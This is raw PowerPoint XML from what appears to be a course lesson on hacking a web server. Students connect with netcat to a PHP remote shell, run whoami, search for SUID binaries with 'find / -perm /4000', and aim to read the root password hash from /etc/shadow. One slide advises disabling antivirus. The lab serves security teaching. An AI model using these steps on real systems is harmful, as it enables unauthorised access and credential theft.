              <a:t>Navigate to the directory that you unzipped the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> application to.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Then type: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nc.exe &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> address of server&gt; 10101</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="A picture containing text, clock&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31939612-7D33-1AB3-7745-7E6EDF5BC02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54765" y="2917932"/>
            <a:ext cx="4458580" cy="1796943"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8E10A1F-8267-CE0B-3DB9-2D9363DABF1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8060875" y="4885507"/>
            <a:ext cx="3143250" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:hlinkClick r:id="rId3" tooltip="https://de.wikipedia.org/wiki/Netcat"/>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4272427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Remote shell</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6332222"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At this point you can start typing Linux commands.  Try typing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> to the list of files in this directory or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> to see the user the webserver is running as.  You can also use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> to try and move to other directories on the machine.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1"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2400" dirty="0"/>
              <a:t>If instead of this, the browser finishes loading the page quickly.  You’ve probably encountered an error.  Check your script and try again.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="A picture containing text, clock&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B8FC29C-DEEF-0F6A-0D70-19F3A012482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54765" y="2917932"/>
            <a:ext cx="4458580" cy="1796943"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35F96F54-7336-6CC6-1D31-35B2F569EB3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8060875" y="4885507"/>
            <a:ext cx="3143250" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:hlinkClick r:id="rId3" tooltip="https://de.wikipedia.org/wiki/Netcat"/>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895890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Remote shell</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6332222"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It’s worth pointing out that sometimes web servers are configured to only keep a HTTP connection open for a short period of time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>After that the server will simply terminate your PHP script.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>If that happens just reload your PHP script and re-connect.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="1"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US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="A picture containing text, clock&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B8FC29C-DEEF-0F6A-0D70-19F3A012482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54765" y="2917932"/>
            <a:ext cx="4458580" cy="1796943"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35F96F54-7336-6CC6-1D31-35B2F569EB3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8060875" y="4885507"/>
            <a:ext cx="3143250" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:hlinkClick r:id="rId3" tooltip="https://de.wikipedia.org/wiki/Netcat"/>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651374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Privilege Escalation</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6332222"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cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>If you ran the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> command, you should see it report the name: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>www-data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>This is a minimally privileged account that the Apache web server runs under.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>In order to do some real damage to a machine we are probably going to need higher level access.  This is known as “privilege escalation”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>On a Unix/Linux machine the account with the most access is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> called “root”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="A picture containing text, clock&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61BC7CEA-8448-92A0-540A-42168278DBB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54765" y="2917932"/>
            <a:ext cx="4458580" cy="1796943"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D16F20F-2339-57ED-7337-C2F8F4F35E26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8060875" y="4885507"/>
            <a:ext cx="3143250" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:hlinkClick r:id="rId3" tooltip="https://de.wikipedia.org/wiki/Netcat"/>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260485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Privilege Escalation</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6332222"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cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>There are thousands of ways to escalate privileges on a Linux machine.  For the purpose of this course, we are going to concentrate on just a few.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>The first involves looking for files that have a very special permission.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="A picture containing text, clock&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27541B42-6A11-4D99-B239-A8A279F5ADF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54765" y="2917932"/>
            <a:ext cx="4458580" cy="1796943"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{124B024E-C96C-C16E-22E1-18F28F76DCF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8060875" y="4885507"/>
            <a:ext cx="3143250" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:hlinkClick r:id="rId3" tooltip="https://de.wikipedia.org/wiki/Netcat"/>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3188846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Privilege Escalation</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6332222"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cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Normally when you run a program on Linux.  The privileges that program has are the same as the privileges your account has on that Linux machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>That means, that if you can’t access the directory </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etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/shadow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> then typing ls </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etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/shadow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> won’t give you access either.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>However, this isn’t always the case</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="A picture containing text, clock&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA1282C1-6BB9-1748-F4D8-CC9233A1FCD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54765" y="2917932"/>
            <a:ext cx="4458580" cy="1796943"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{654122D4-28F5-E95D-E988-27F1994F59CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8060875" y="4885507"/>
            <a:ext cx="3143250" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:hlinkClick r:id="rId3" tooltip="https://de.wikipedia.org/wiki/Netcat"/>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874394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Privilege Escalation</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6332222"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cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>However, this isn’t always the case. Programs, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -- which allows you to change your password. Run with a higher access level than you have.  Even if you are the one running it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>This is achieved because the file has a special privilege known as SUID. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SUID means that when that program is run it acts as if the owner of the program is running it.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="A picture containing text, clock&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA1282C1-6BB9-1748-F4D8-CC9233A1FCD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54765" y="2917932"/>
            <a:ext cx="4458580" cy="1796943"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{654122D4-28F5-E95D-E988-27F1994F59CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8060875" y="4885507"/>
            <a:ext cx="3143250" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:hlinkClick r:id="rId3" tooltip="https://de.wikipedia.org/wiki/Netcat"/>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17038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Privilege Escalation</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6332222"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cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>So, if the program is owned by root, then it can do anything root can – even when you’re the one running it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>It’s not hard to see why finding a program which is has SUID set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> is owned by root is a gold mine for hackers!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>There’s actually an easy way to do this too. We will be using the find command to search for files based on their permissions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>find / -perm /4000 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="A picture containing text, clock&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA1282C1-6BB9-1748-F4D8-CC9233A1FCD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54765" y="2917932"/>
            <a:ext cx="4458580" cy="1796943"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{654122D4-28F5-E95D-E988-27F1994F59CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8060875" y="4885507"/>
            <a:ext cx="3143250" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:hlinkClick r:id="rId3" tooltip="https://de.wikipedia.org/wiki/Netcat"/>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848964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Getting started</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80" y="2120900"/>
            <a:ext cx="10058400" cy="3748194"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You should also grab a copy of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, which is in the tools section of canvas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Unzip this to a directory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Note: It’s pretty likely that your anti-virus software will complain about either downloading or unzipping this file.  This tool is used in many types of malware, so it’s frequently flagged by your Antivirus software.  You will have to tell your AV program to leave this file alone (or at worst turn your AV off while you do this lesson)</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759957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Remote shell</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4364616"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Let’s say our goal here is to find the encrypted hash of the password for the root account.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
